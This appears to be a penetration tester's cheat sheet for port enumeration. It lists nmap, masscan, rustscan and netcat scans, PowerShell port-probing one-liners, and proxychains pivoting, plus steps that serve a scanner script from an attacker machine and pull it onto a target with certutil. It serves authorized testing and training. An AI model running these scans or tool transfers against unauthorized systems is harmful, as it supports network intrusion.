Enumeration - Ports

sudo nmap -p- -Pn -vv $IP
# cat ports.txt | awk '{print $1}' | cut -d "/" -f1 | tr '\n' ','
# cat ports.txt | cut -d "/" -f 1 | tr '\n' ','
sudo nmap -p 22,80 -sV -sC -vv $IP

sudo nmap -p 111 -sU -Pn -vv $IP
sudo nmap -p 2049 -sU -Pn -vv $IP

sudo nmap -sU -T4 -vv $IP

proxychains nmap -p- -vv --open  172.16.5.35 2>/dev/null

1..80   | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.107.142",$_)) "Port $_ is open!"} 2>$null
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.190.12",$_)) "Port $_ is open!"} 2>$null

foreach ($port in 71..81) {If (($a=Test-NetConnection 10.10.107.142 -Port $port -WarningAction SilentlyContinue).tcpTestSucceeded -eq $true){ "TCP port $port is open!"}}

wget https://raw.githubusercontent.com/BornToBeRoot/PowerShell_IPv4PortScanner/main/Scripts/IPv4PortScan.ps1 -O /opt/windows/IPv4PortScan.ps1
mkdir -p /home/kali/workspace/www
cd /home/kali/workspace/www
cp /opt/windows/IPv4PortScan.ps1 .

python3 -m http.server 80

certutil -urlcache -f http://192.168.45.226/IPv4PortScan.ps1 IPv4PortScan.ps1
wget http://192.168.45.226/IPv4PortScan.ps1 -O IPv4PortScan.ps1

.\IPv4PortScan.ps1 -ComputerName DC01.MEDTECH.COM -StartPort 1 -EndPort 65535 | ft

.\IPv4PortScan.ps1 -ComputerName 172.16.126.14 -StartPort 1 -EndPort 65535 | ft

.\IPv4PortScan.ps1 -ComputerName 172.16.126.14 -StartPort 1 -EndPort 1000 | ft
.\IPv4PortScan.ps1 -ComputerName 172.16.126.14 -StartPort 1000 -EndPort 10000 | ft
.\IPv4PortScan.ps1 -ComputerName 172.16.126.14 -StartPort 10000 -EndPort 65535 | ft

netcat -nvz $IP 80
netcat -nvz $IP 1-65535

.\nc.exe -nvz $IP 80

sudo hping3 --scan all -S $IP

sudo apt remove -y unicornscan
sudo apt autoclean
sudo apt autoremove
sudo apt install -y unicornscan

sudo unicornscan -mU -vv $IP

sudo apt remove -y masscan
sudo apt autoclean
sudo apt autoremove
sudo apt install -y masscan

sudo masscan -pU:1-120 $IP

alias rustscan='docker run -it --rm --name rustscan rustscan/rustscan:alpine'

rustscan $IP -t 500 -b 1500 -- -A